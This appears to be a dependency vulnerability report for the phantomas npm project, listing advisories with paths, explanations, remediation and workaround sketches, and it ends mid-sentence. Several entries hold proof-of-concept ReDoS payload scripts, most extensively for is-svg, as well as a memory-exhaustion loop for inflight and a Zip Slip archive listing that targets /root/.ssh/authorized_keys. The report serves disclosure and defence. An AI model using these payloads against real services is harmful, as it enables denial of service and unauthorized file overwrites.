Vulnerabilities: 12 (via 22 paths)
Dependencies: 422
Source: GitHub
Commit: 46a3d7a5

Severity: 1 critical · 3 high · 8 medium

critical severity

Heap-based Buffer Overflow

  • Vulnerable module: sharp
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 sharp@0.32.4

Overview

sharp is a high-performance Node.js image processing library, the fastest module to resize JPEG, PNG, WebP, GIF, AVIF and TIFF images.

Affected versions of this package are vulnerable to Heap-based Buffer Overflow when the ReadHuffmanCodes() function is used. An attacker can craft a special WebP lossless file that triggers the ReadHuffmanCodes() function to allocate the HuffmanCode buffer with a size that comes from an array of precomputed sizes: kTableSize. The color_cache_bits value defines which size to use. The kTableSize array only takes into account sizes for 8-bit first-level table lookups but not second-level table lookups. libwebp allows codes that are up to 15-bit (MAX_ALLOWED_CODE_LENGTH). When BuildHuffmanTable() attempts to fill the second-level tables it may write data out-of-bounds. The OOB write to the undersized array happens in ReplicateValue.

Notes:

This is only exploitable if the color_cache_bits value defines which size to use.

This vulnerability was also published for libwebp as CVE-2023-5129.

Changelog:

2023-09-12: Initial advisory publication

2023-09-27: Advisory details updated, including CVSS, references

2023-09-27: CVE-2023-5129 rejected as a duplicate of CVE-2023-4863

2023-09-28: Research and addition of additional affected libraries

2024-01-28: Additional fix information

Remediation

Upgrade sharp to version 0.32.6 or higher.
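
If upgrading immediately is not possible, one stopgap (not part of the advisory) is to refuse WebP input before it reaches sharp, since the overflow is triggered by crafted WebP lossless files. A minimal sketch that sniffs the WebP RIFF signature; the upload path is hypothetical:

const fs = require('fs');

// WebP files start with the RIFF container signature:
// bytes 0-3 are "RIFF" and bytes 8-11 are "WEBP".
function isWebP(filePath) {
  const header = Buffer.alloc(12);
  const fd = fs.openSync(filePath, 'r');
  fs.readSync(fd, header, 0, 12, 0);
  fs.closeSync(fd);
  return header.toString('ascii', 0, 4) === 'RIFF' &&
         header.toString('ascii', 8, 12) === 'WEBP';
}

// Hypothetical guard before handing untrusted uploads to sharp:
if (isWebP('upload.bin')) {
  throw new Error('WebP input rejected until sharp is upgraded to 0.32.6 or higher');
}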

high severity

Denial of Service (DoS)

  • Vulnerable module: file-type
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 file-type@16.5.3

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). A malformed MKV file could cause the file type detector to get caught in an infinite loop. This would make the application become unresponsive and could be used to cause a DoS attack.
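
Until the upgrade is in place, one way to bound the impact (not part of the advisory) is to run detection off the main event loop with a hard time budget. A sketch using Node.js worker_threads and file-type@16's fromFile API; the file path and timeout are assumptions:

const { Worker, isMainThread, parentPort, workerData } = require('worker_threads');

if (isMainThread) {
  // Run detection in a worker and kill it if it exceeds the time budget,
  // so a malformed file cannot hang the main event loop indefinitely.
  function detectWithTimeout(filePath, timeoutMs = 2000) {
    return new Promise((resolve, reject) => {
      const worker = new Worker(__filename, { workerData: filePath });
      const timer = setTimeout(() => {
        worker.terminate(); // hard-stop a stuck detection
        reject(new Error('file-type detection timed out'));
      }, timeoutMs);
      worker.once('message', (result) => { clearTimeout(timer); resolve(result); });
      worker.once('error', (err) => { clearTimeout(timer); reject(err); });
    });
  }

  // 'upload.mkv' is a hypothetical path for this sketch.
  detectWithTimeout('upload.mkv')
    .then((type) => console.log(type)) // e.g. { ext: 'mkv', mime: 'video/x-matroska' }
    .catch((err) => console.error(err.message));
} else {
  const FileType = require('file-type');
  FileType.fromFile(workerData).then((type) => parentPort.postMessage(type || null));
}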

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption - An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For example, the npm ws package.

Remediation

Upgrade file-type to version 16.5.4, 17.1.3 or higher.

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a package providing a regular expression for matching semver versions.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). This can occur when running the regex on untrusted user input in a server context.
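
In this dependency chain the regex is typically reached through find-versions, which bin-version uses to parse version output from executed binaries. A small illustration of that entry point (an assumption based on the path above, not taken from the advisory):

const findVersions = require('find-versions');

// Whatever string is passed here is matched internally by semver-regex,
// so untrusted or attacker-influenced input is what makes the ReDoS reachable.
console.log(findVersions('unicorns v1.2.3'));
//=> ['1.2.3']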

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.
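
The growth above can be reproduced in a few lines of Node.js; the regex and inputs mirror the example in this section, and exact timings will vary by machine:

const { performance } = require('perf_hooks');

const evil = /A(B|C+)+D/;

for (let n = 20; n <= 30; n += 2) {
  const input = 'A' + 'C'.repeat(n) + 'X'; // the trailing 'X' forces a full backtrack
  const start = performance.now();
  evil.test(input);
  console.log(`${n} C's: ${(performance.now() - start).toFixed(1)} ms`);
}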

Remediation

Upgrade semver-regex to version 4.0.1, 3.1.3 or higher.

high severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: semver-regex
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 bin-version-check@4.0.0 bin-version@3.1.0 find-versions@3.2.0 semver-regex@2.0.0

Overview

semver-regex is a package providing a regular expression for matching semver versions.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The semverRegex function contains a regex that allows exponential backtracking.

PoC

import semverRegex from 'semver-regex';

// The following payload would take excessive CPU cycles
var payload = '0.0.0-0' + '.-------'.repeat(100000) + '@';
semverRegex().test(payload);

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade semver-regex to version 3.1.3 or higher.

medium severity

Arbitrary File Write via Archive Extraction (Zip Slip)

  • Vulnerable module: decompress-tar
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 decompress@4.2.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 decompress@4.2.1 decompress-tarbz2@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 decompress@4.2.1 decompress-targz@4.1.1 decompress-tar@4.1.1

Overview

decompress-tar is a tar plugin for decompress.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). It is possible to bypass the security measures provided by decompress and conduct ZIP path traversal through symlinks.

PoC

const decompress = require('decompress');

decompress('slip.tar.gz', 'dist').then(files => {
    console.log('done!');
});

Details

It is exploited using a specially crafted zip archive that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a "../../file.exe" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ and overwriting the authorized_keys file:

2018-04-15 22:04:29 ..... 19 19 good.txt
2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys

Remediation

There is no fixed version for decompress-tar.
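
With no fixed release available, one defensive option is to reject archive entries that would resolve outside the extraction directory, using decompress's documented filter option. A hedged sketch (the archive name is a placeholder); note that this blocks traversal-style entry names but may not cover every symlink-based variant described in this advisory:

const path = require('path');
const decompress = require('decompress');

const dest = path.resolve('dist');

decompress('archive.tar.gz', dest, {
  // Drop any entry whose resolved path escapes the destination directory.
  filter: (file) => path.resolve(dest, file.path).startsWith(dest + path.sep),
}).then((files) => {
  console.log(`extracted ${files.length} entries`);
});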

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: analyze-css@2.2.7 and analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-css@2.2.7 cli@1.0.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin@7.0.1 globby@10.0.2 glob@7.2.3 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability can exhaust memory and crash the Node.js process or the application.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;

  function scheduleNext() {
    const key = `key-${i++}`;
    const callback = () => {};

    // Register a large number of callbacks under a fresh key each tick;
    // on affected versions the entries accumulate in the internal reqs
    // object and memory grows.
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    if (i % 100 === 0) {
      console.log(process.memoryUsage());
    }

    setImmediate(scheduleNext);
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.
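
Because no fixed version exists, the practical path is the one noted above: dependents replace inflight with a small Promise-based coalescer that always releases its entries. A minimal sketch of that replacement pattern (an illustration, not code from any particular package):

const pending = new Map();

// Concurrent callers with the same key share one execution; unlike inflight,
// the entry is always deleted once the work settles, so nothing accumulates.
function onceInflight(key, work) {
  if (pending.has(key)) {
    return pending.get(key);
  }
  const promise = Promise.resolve()
    .then(work)
    .finally(() => pending.delete(key));
  pending.set(key, promise);
  return promise;
}

// Example: both calls share the same underlying promise and print 42.
onceInflight('stat:/tmp', () => Promise.resolve(42)).then(console.log);
onceInflight('stat:/tmp', () => Promise.resolve(99)).then(console.log);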

medium severity

Open Redirect

  • Vulnerable module: got
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-build@3.0.0 download@6.2.5 got@7.1.0
  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 got@8.3.2

Overview

Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs, which allowed a request to be redirected to a UNIX socket.

Remediation

Upgrade got to version 11.8.5, 12.1.0 or higher.
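
If the transitive got versions pinned by download@6.x/7.x cannot be upgraded, a workaround (not from the advisory) is to stop following redirects automatically and only re-issue requests to plain http(s) targets. A hedged sketch using got's documented followRedirect and throwHttpErrors options; the URL is a placeholder:

const got = require('got');

got('https://example.com/file', { followRedirect: false, throwHttpErrors: false })
  .then((res) => {
    if (res.statusCode >= 300 && res.statusCode < 400) {
      const location = res.headers.location || '';
      // Refuse anything that is not a plain http(s) URL (e.g. unix: sockets).
      if (!/^https?:\/\//i.test(location)) {
        throw new Error(`refusing to follow redirect to ${location}`);
      }
      return got(location);
    }
    return res;
  })
  .then((res) => console.log(res.statusCode))
  .catch((err) => console.error(err.message));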

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: http-cache-semantics
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 imagemin-gifsicle@7.0.0 gifsicle@5.3.0 bin-wrapper@4.1.0 download@7.1.0 got@8.3.2 cacheable-request@2.1.4 http-cache-semantics@3.8.1

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.

PoC

Steps to reproduce:

Run the following script in Node.js after installing the http-cache-semantics NPM package:

const CachePolicy = require("http-cache-semantics");
// performance is a global in Node.js 16+, required here for older versions
const { performance } = require("perf_hooks");

for (let i = 0; i <= 5; i++) {
  const attack = "a" + " ".repeat(i * 7000) + "z";

  const start = performance.now();
  new CachePolicy(
    { headers: {} },
    {
      headers: {
        "cache-control": attack,
      },
    }
  );
  console.log(`${attack.length}: ${performance.now() - start}ms`);
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade http-cache-semantics to version 4.1.1 or higher.

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: is-svg
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 is-svg@3.0.0

Overview

is-svg is a package that checks whether a string or buffer is SVG.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). If an attacker provides a malicious string, is-svg will get stuck processing the input for a very long time.

You are only affected if you use this package on a server that accepts SVG as user-input.
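
As an interim measure while upgrading, one option (not from the advisory) is to cap the size of user-supplied input before calling is-svg; this limits, but does not necessarily eliminate, how long the vulnerable regexes can run. The limit below is an arbitrary example:

const isSvg = require('is-svg');

const MAX_SVG_BYTES = 64 * 1024; // arbitrary cap for this sketch

function isProbablySvg(input) {
  // Refuse oversized payloads instead of letting the regex engine chew on them.
  if (Buffer.byteLength(input) > MAX_SVG_BYTES) {
    return false;
  }
  return isSvg(input);
}

console.log(isProbablySvg('<svg xmlns="http://www.w3.org/2000/svg"></svg>')); // true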

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD.

In most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30-character string takes around 52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use the RegEx 101 debugger to see that the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String | Number of C's | Number of steps
ACCCX | 3 | 38
ACCCCX | 4 | 71
ACCCCCX | 5 | 136
ACCCCCCCCCCCCCCX | 14 | 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause the engine to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this behavior and cause the service to consume excessive CPU, resulting in a Denial of Service.

Remediation

Upgrade is-svg to version 4.2.2 or higher.

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: is-svg
  • Introduced through: analyze-image@1.0.0

Detailed paths

  • Introduced through: phantomas@macbre/phantomas#46a3d7a5bf3bc48bcb003aad853607443faad0f9 analyze-image@1.0.0 is-svg@3.0.0

Overview

is-svg is a package that checks whether a string or buffer is SVG.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the removeDtdMarkupDeclarations and entityRegex regular expressions, bypassing the fix for CVE-2021-28092.

PoC by Yeting Li

// 1) First ReDoS, caused by the two sub-regexes [A-Z]+ and [^>]* in `removeDtdMarkupDeclarations`.
const isSvg = require('is-svg');

function build_attack1(n) {
  var ret = '<!';
  for (var i = 0; i < n; i++) {
    ret += 'DOCTYPE';
  }
  return ret;
}

for (var i = 1; i <= 50000; i++) {
  if (i % 10000 == 0) {
    var time = Date.now();
    var attack_str = build_attack1(i);
    isSvg(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}

// 2) Second ReDoS, caused by the first sub-regex \s* in `entityRegex`.
function build_attack2(n) {
  var ret = '';
  for (var i = 0; i < n; i++) {
    ret += ' ';
  }
  return ret;
}

for (var i = 1; i <= 50000; i++) {
  if (i % 10000 == 0) {
    var time = Date.now();
    var attack_str = build_attack2(i);
    isSvg(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}

// 3) Third ReDoS, caused by the sub-regex \s+\S*\s* in `entityRegex`.
function build_attack3(n) {
  var ret = '<!Entity';
  for (var i = 0; i < n; i++) {
    ret += ' ';
  }
  return ret;
}

for (var i = 1; i <= 50000; i++) {
  if (i % 10000 == 0) {
    var time = Date.now();
    var attack_str = build_attack3(i);
    isSvg(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}

// 4) Fourth ReDoS, caused by the sub-regex \S*\s*(?:"|')[^"]+ in `entityRegex`.
function build_attack4(n) {
  var ret = '<!Entity ';
  for (var i = 0; i < n; i++) {
    ret += "'";
  }
  return ret;
}

for (var i = 1; i <= 50000; i++) {
  if (i % 10000 == 0) {
    var time = Date.now();
    var attack_str = build_attack4(i);
    isSvg(attack_str);
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
  }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
